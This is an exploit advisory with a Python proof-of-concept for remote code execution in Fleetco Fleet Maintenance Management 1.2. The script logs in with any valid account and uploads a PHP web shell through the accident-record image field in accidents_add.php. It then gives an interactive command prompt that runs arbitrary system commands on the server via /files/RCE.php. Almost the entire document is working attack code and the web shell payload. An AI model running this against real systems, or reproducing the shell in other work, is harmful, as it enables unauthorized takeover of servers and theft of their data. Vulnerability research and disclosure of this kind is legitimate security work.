# Exploit Title: Fleetco Fleet Maintenance Management 1.2 - Remote Code Execution
# Date: 2018-11-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://www.fleetco.space
# Software Link: http://www.fleetco.space/download/215/
# Version: v1.2
# Category: Webapps
# Tested on: XAMPP for Linux 1.7.2
# Software Description : Fleetco FMM is a free, web-based vehicle fleet maintenance management
# system written in PHP with MySQL database backend.
# Description : Fleetco 1.2 and lower versions let any authenticated user upload arbitrary ".php" files
# through the accident-record image field (accidents_add.php); the uploaded file is then served back
# from /files/, which leads to remote command execution on the server. Any authenticated account is
# sufficient to exploit.
# ==================================================================
# PoC:

#!/usr/bin/python

import mechanize
import sys
import cookielib
import requests
import colorama
from colorama import Fore

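print(" [*] Fleetco Fleet Maintenance Management v1.2 - Remote Code Execution")
print("[*] Vulnerability discovered by AkkuS")
print("[*] My Blog - https://www.pentest.com.tr ")

# Multipart boundary of the hand-built accident-record POST.  Each part
# delimiter in the body is "--" + BOUNDARY, the closing one "--" + BOUNDARY + "--".
BOUNDARY = "---------------------------10664657171782352435254769348"

# Name the attachment is uploaded under; the PoC relies on the server keeping
# it verbatim below /files/ (no rename, no extension filtering).
SHELL_NAME = "RCE.php"

# Minimal PHP web shell.  system() only runs when a cmd parameter is present,
# so a bare GET of the file is a harmless liveness probe.
SHELL_SOURCE = (
    "<?php if(isset($_REQUEST['cmd'])){ echo \"<pre>\"; "
    "$cmd = ($_REQUEST['cmd']); system($cmd); echo \"</pre>\"; die; }?>"
)


def build_multipart_body(boundary, parts):
    """Serialize form parts as a multipart/form-data body.

    Args:
        boundary: boundary string (without the leading "--").
        parts: sequence of either ``(name, value)`` for plain fields or
            ``(name, filename, content_type, content)`` for file fields,
            emitted in the given order.

    Returns:
        The body as a str, with CRLF line endings as RFC 2046 requires.  The
        original PoC kept this as one literal and lost the line breaks, which
        makes the server reject the body; building it here keeps it valid.
    """
    delimiter = "--" + boundary
    lines = []
    for part in parts:
        lines.append(delimiter)
        if len(part) == 2:
            name, value = part
            lines.append('Content-Disposition: form-data; name="%s"' % name)
            lines.append("")
            lines.append(value)
        else:
            name, filename, content_type, content = part
            lines.append(
                'Content-Disposition: form-data; name="%s"; filename="%s"'
                % (name, filename)
            )
            lines.append("Content-Type: " + content_type)
            lines.append("")
            lines.append(content)
    lines.append(delimiter + "--")
    lines.append("")  # terminating CRLF after the closing delimiter
    return "\r\n".join(lines)


def accident_record_parts():
    """Return the form parts of a new accident record carrying the PHP shell.

    Field names and filler values are those of the tested request; the only
    parts that matter for the upload are ``type_Images_1``, the
    ``value_Images_1`` file part and ``filename_Images_1``.
    """
    return [
        ("value_Fleet_1", "Cargo Carriers"),
        ("value_Vehicle_1", "BF1470"),
        ("value_Type_1", "Lorry"),
        ("value_Date_1", "11/07/2018"),
        ("type_Date_1", "date2"),
        ("type_Time_1", "time"),
        ("value_Driver_1", "Antony Croos"),
        ("value_Details_1", "test"),
        ("type_Images_1", "upload2"),
        ("value_Images_1", SHELL_NAME, "application/x-php", SHELL_SOURCE),
        ("filename_Images_1", SHELL_NAME),
        ("value_EnteredBy_1", "Mark Croos"),
        ("value_SysDate_1", "2018-11-23 14:58:09"),
        ("id", "1"),
        ("a", "added"),
        ("rndVal", "0.8040138072331872"),
    ]


def login(rhost, username, password):
    """Log in through /login.php with mechanize.

    Args:
        rhost: host[:port] of the target.
        username, password: credentials of any valid account.

    Returns:
        ``(browser, cookiejar)``; the jar carries the session cookie that the
        later requests calls reuse.

    Raises:
        RuntimeError: when /login.php does not serve HTML.  Login failure is
        not detected here: the app's post-login page is not known, so the
        caller only prints the resulting page title for the operator.
    """
    browser = mechanize.Browser()
    browser.set_handle_robots(False)
    jar = cookielib.LWPCookieJar()
    browser.set_cookiejar(jar)

    browser.open("http://" + rhost + "/login.php")
    if not browser.viewing_html():
        raise RuntimeError("/login.php did not return an HTML page")
    # Two selections as in the original PoC; the second (first form on the
    # page) is the one that is actually filled in.
    browser.select_form(name="form1")
    browser.select_form(nr=0)
    browser.form['username'] = username
    browser.form['password'] = password
    browser.submit()
    return browser, jar


def upload_shell(rhost, jar):
    """POST the accident record that carries the shell; return the response.

    An HTTP 200 only means the request was accepted, not that the file was
    stored -- check /files/SHELL_NAME afterwards.
    """
    headers = {"Content-Type": "multipart/form-data; boundary=" + BOUNDARY}
    body = build_multipart_body(BOUNDARY, accident_record_parts())
    return requests.post(
        "http://" + rhost + "/accidents_add.php?submit=1&",
        headers=headers,
        cookies=jar,
        data=body,
    )


def main(argv):
    """Run the PoC: log in, drop the shell, then serve an interactive prompt.

    Returns a process exit status.  Note that the shell stays on the target
    after this script exits -- remove /files/RCE.php when the test is done.
    """
    if len(argv) != 2:
        print("[*] Usage: poc.py <RHOST>")
        return 0
    rhost = argv[1]

    username = str(raw_input("User Name: "))
    password = str(raw_input("Password: "))

    print(Fore.BLUE + "+ [*] Loging in...")
    browser, jar = login(rhost, username, password)
    title = browser.title() or "<untitled>"
    print(Fore.YELLOW + "+ [*] You're in " + title + " section of the app now")

    upload = upload_shell(rhost, jar)
    if upload.status_code == 200:
        print(Fore.GREEN + "+ [*] Upload request accepted, checking the shell...")

    # Probe once before the prompt instead of on every command; a bare GET
    # does not execute anything (see SHELL_SOURCE).
    shell_url = "http://" + rhost + "/files/" + SHELL_NAME
    if requests.get(shell_url).status_code != 200:
        print(Fore.RED + "+ [X] Unable to upload or access the shell")
        return 1
    print(Fore.GREEN + "+ [*] Shell successfully uploaded!")

    while True:
        command = str(raw_input(Fore.WHITE + "shell> "))
        if command in ("exit", "quit"):
            return 0
        # params= URL-encodes the command; the original concatenated it into
        # the query string, so anything with '&', '#' or spaces was mangled.
        response = requests.get(shell_url, params={"cmd": command})
        print(response.text)


if __name__ == "__main__":
    sys.exit(main(sys.argv))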